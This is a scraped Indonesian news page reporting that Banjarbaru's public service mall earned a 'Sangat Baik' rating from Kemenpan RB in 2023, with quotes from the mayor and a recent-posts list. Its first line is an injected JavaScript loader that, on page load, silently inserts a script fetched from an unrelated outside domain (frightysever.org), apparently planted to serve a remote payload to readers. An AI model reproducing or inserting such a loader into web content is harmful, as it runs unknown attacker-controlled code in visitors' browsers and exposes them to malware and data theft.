(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

MPP Banjarbaru Berpredikat Kinerja “Sangat Baik” Tahun 2023


KANALKALIMANTAN.COM, BANJARBARU – Kementerian Pendayagunaan Aparatur Negara dan Reformasi Birokrasi (Kemenpan RB) mengumumkan hasil monitoring dan evaluasi penyelenggaraan Mal Pelayanan Publik (MPP) sepanjang tahun 2023. Dari daftar yang dirilis, MPP Banjarbaru sukses bertengger dan meraih predikat kinerja “Sangat Baik”.

Daftar itu dimuat dalam Surat Keputusan tentang Hasil Monitoring dan Evaluasi Penyelenggaran Mal Pelayanan Publik Tahun 2023 dan ditandatangani secara langsung Menpan RB, Abdullah Azwar Anas.

MPP Banjarbaru yang dikelola Dinas PMPTSP dinyatakan telah memenuhi berbagai indikasi penilaian sebagaimana yang telah ditentukan. Kategori nilai “Sangat Baik” yang diraih MPP Banjarbaru memiliki rentang nilai 76,6-88,3.

Baca juga: Kapolda Kalsel Irjen Andi Rian Bergeser ke Polda Sulsel, Ini Jenderal Penggantinya

Bukan hal yang tidak mungkin, sebab di era Wali Kota HM Aditya Mufti Ariffin, MPP Banjarbaru selalu dituntut berinovasi dalam memberikan layanan publik demi kepuasan masyarakat.

“Alhamdulillah, MPP Kota Banjarbaru berhasil meraih predikat sangat baik berdasarkan hasil monitoring dan evaluasi dari Kemenpan RB. Ini merupakan hasil upaya kerja keras DPMPTSP dan SKPD lain dalam mendukung penyelenggaran layanan birokrasi prima,” ucapnya, Jumat (8/12/2023).

Menurut Wali Kota Aditya, MPP sudah seharusnya menjadi tulang punggung untuk mendorong penyelenggaraan pelayanan publik birokrasi yang berdampak kepada masyarakat luas.

“Penggunaan teknologi digital, aksesibilitas pelayanan mudah, cepat, terjangkau dan terintegritas, itu semua harus ada di MPP. Jangan sampai di era saat ini membuat masyarakat kebingungan dan kerepotan mengurus administrasi di Banjarbaru,” tegasnya.

Baca juga: Desa Murung Kenanga Salurkan BLT Dana Desa

Keberadaan MPP Banjarbaru saat ini, diakui Aditya, masih harus terus ditingkatkan. Sebab salah satu peran krusial dengan adanya kehadiran MPP ialah mendukung kemajuan sektor investasi di Ibu Kota Kalimantan Selatan.

“Seperti yang kita tahu, investasi Kota Banjarbaru pada tahun 2022 tadi mengalami lonjakan yang sangat tinggi dengan kenaikan mencapai 496 persen. Artinya apa, Banjarbaru memiliki potensi yang besar untuk terus bertumbuh. MPP Kota Banjarbaru ini harus mampu menggaet investor-investor yang berdatangan. Tentunya dengan memberikan pelayanan yang terbaik,” tuntasnya. (Kanalkalimantan.com/bie)

Reporter : bie
Editor : kk


Risa

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

10 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

11 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

12 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

13 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

16 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

19 jam ago

This website uses cookies.